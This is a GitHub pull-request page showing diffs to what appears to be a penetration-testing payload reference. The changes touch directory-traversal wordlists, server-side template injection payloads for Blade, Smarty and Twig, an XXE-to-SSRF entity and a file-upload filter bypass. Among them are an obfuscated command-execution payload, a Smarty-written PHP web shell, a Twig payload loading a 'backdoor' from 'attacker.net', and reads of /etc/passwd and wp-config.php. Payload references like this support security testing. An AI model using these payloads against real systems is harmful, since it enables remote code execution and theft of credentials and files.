Skip to content

[pull] master from swisskyrepo:master #377

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
pull merged 8 commits into from
Nov 15, 2025
Merged

[pull] master from swisskyrepo:master #377

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
8 commits
Select commit Hold shift + click to select a range
aa85b80
correction of xxe ssrf payload
piranhaAD Sep 9, 2025
9a08798
hacktoberfest - Update YouTube.md with new resources
Aaditya-Chunekar Oct 22, 2025
3359054
Fixed missing {FILE} placeholders
Reelix Oct 31, 2025
832b54f
Syntax Highlighting SSTI
swisskyrepo Nov 15, 2025
24527a5
Merge pull request #791 from piranhaAD/patch-1
swisskyrepo Nov 15, 2025
e653e7c
Merge pull request #802 from Aaditya-Chunekar/patch-1
swisskyrepo Nov 15, 2025
80a6b5e
Merge pull request #806 from Reelix/patch-1
swisskyrepo Nov 15, 2025
ca50df2
Fix markdown linting
swisskyrepo Nov 15, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
14 changes: 7 additions & 7 deletions Directory Traversal/Intruder/traversals-8-deep-exotic-encoding.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -877,11 +877,11 @@
/..\..\\..\..\\..\..\\\{FILE}
/..\..\\..\..\\..\..\\..\\\{FILE}
/..\..\\..\..\\..\..\\..\..\\\{FILE}
/\..%2f
/\..%2f\..%2f
/\..%2f\..%2f\..%2f
/\..%2f\..%2f\..%2f\..%2f
/\..%2f\..%2f\..%2f\..%2f\..%2f
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
/\..%2f{FILE}
/\..%2f\..%2f{FILE}
/\..%2f\..%2f\..%2f{FILE}
/\..%2f\..%2f\..%2f\..%2f{FILE}
/\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
1 change: 1 addition & 0 deletions GraphQL Injection/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -38,6 +38,7 @@
- [nicholasaleks/CrackQL](https://github.com/nicholasaleks/CrackQL) - A GraphQL password brute-force and fuzzing utility
- [nicholasaleks/graphql-threat-matrix](https://github.com/nicholasaleks/graphql-threat-matrix) - GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations
- [dolevf/graphql-cop](https://github.com/dolevf/graphql-cop) - Security Auditor Utility for GraphQL APIs
- [dolevf/graphw00f](https://github.com/dolevf/graphw00f) - GraphQL Server Engine Fingerprinting utility
- [IvanGoncharov/graphql-voyager](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph
- [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client

Expand Down
40 changes: 27 additions & 13 deletions Server Side Template Injection/PHP.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -21,21 +21,34 @@

## Templating Libraries

| Template Name | Payload Format |
| -------------- | --------- |
| Laravel Blade | `{{ }}` |
| Latte | `{var $X=""}{$X}` |
| Mustache | `{{ }}` |
| Plates | `<?= ?>` |
| Smarty | `{ }` |
| Twig | `{{ }}` |
| Template Name | Payload Format |
| --------------- | --------- |
| Blade (Laravel) | `{{ }}` |
| Latte | `{var $X=""}{$X}` |
| Mustache | `{{ }}` |
| Plates | `<?= ?>` |
| Smarty | `{ }` |
| Twig | `{{ }}` |

## Blade

[Official website](https://laravel.com/docs/master/blade)
> Blade is the simple, yet powerful templating engine that is included with Laravel.

The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr(114),[105,100]))}}`.

```php
{{passthru(implode(null,array_map(chr(99).chr(104).chr(114),[105,100])))}}
```

---

## Smarty

[Official website](https://www.smarty.net/docs/en/)
> Smarty is a template engine for PHP.

```python
```php
{$smarty.version}
{php}echo `id`;{/php} //deprecated in smarty v3
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Expand All @@ -52,7 +65,7 @@

### Twig - Basic Injection

```python
```php
{{7*7}}
{{7*'7'}} would result in 49
{{dump(app)}}
Expand All @@ -62,7 +75,7 @@

### Twig - Template Format

```python
```php
$output = $twig > render (
'Dear' . $_GET['custom_greeting'],
array("first_name" => $user.first_name)
Expand All @@ -76,14 +89,14 @@ $output = $twig > render (

### Twig - Arbitrary File Reading

```python
```php
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{include("wp-config.php")}}
```

### Twig - Code Execution

```python
```php
{{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
Expand Down Expand Up @@ -249,4 +262,5 @@ layout template:

## References

- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere- YesWeHack - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
- [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58)
1 change: 1 addition & 0 deletions Server Side Template Injection/Python.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -406,3 +406,4 @@ PoC :
- [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
- [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/)
- [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
- [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits)
1 change: 1 addition & 0 deletions Upload Insecure Files/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -102,6 +102,7 @@ Other extensions that can be abused to trigger other vulnerabilities.
* Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
* Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp`
* Multiple special characters: `file.jsp/././././.`
* UTF8 filename: `Content-Disposition: form-data; name="anyBodyParam"; filename*=UTF8''myfile%0a.txt`

* On Windows OS, `include`, `require` and `require_once` functions will convert "foo.php" followed by one or more of the chars `\x20` ( ), `\x22` ("), `\x2E` (.), `\x3C` (<), `\x3E` (>) back to "foo.php".
* On Windows OS, `fopen` function will convert "foo.php" followed by one or more of the chars `\x2E` (.), `\x2F` (/), `\x5C` (\) back to "foo.php".
Expand Down
9 changes: 8 additions & 1 deletion XXE Injection/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -68,6 +68,13 @@ Basic entity test, when the XML parser parses the external entities the result s

It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server.

These are different types of entities in XML:

| Type | Prefix | Where usable |
| ---------------- | -------- | --------------------------- |
| General entity | `&name;` | Inside XML document content |
| Parameter entity | `%name;` | Only inside the DTD |

## Exploiting XXE to Retrieve Files

### Classic XXE
Expand Down Expand Up @@ -155,7 +162,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://internal.service/secret_pass.txt" >
<!ENTITY xxe SYSTEM "http://internal.service/secret_pass.txt" >
]>
<foo>&xxe;</foo>
```
Expand Down
2 changes: 2 additions & 0 deletions _LEARNING_AND_SOCIALS/YOUTUBE.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -19,6 +19,7 @@
- [Jack Rhysider - Darknet Diaries](https://www.youtube.com/@JackRhysider)
- [John Hammond - Wargames and CTF writeups](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw)
- [Laluka - OffenSkill - Sharing is Caring](https://www.youtube.com/@TheLaluka)
- [LaurieWired - reverse engineering and research](https://www.youtube.com/@lauriewired)
- [LiveOverflow - Explore weird machines...](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w)
- [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A)
- [Nahamsec](https://www.youtube.com/c/Nahamsec)
Expand All @@ -30,6 +31,7 @@
- [STÖK](https://www.youtube.com/c/STOKfredrik)
- [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw)
- [The Hated one](https://www.youtube.com/channel/UCjr2bPAyPV7t35MvcgT3W8Q)
- [Tib3rius - CTF walkthroughs, deep dives, web app hacking, and more!](https://www.youtube.com/@tib3rius)
- [xct hacks](https://www.youtube.com/@xct_de)

## Conferences
Expand Down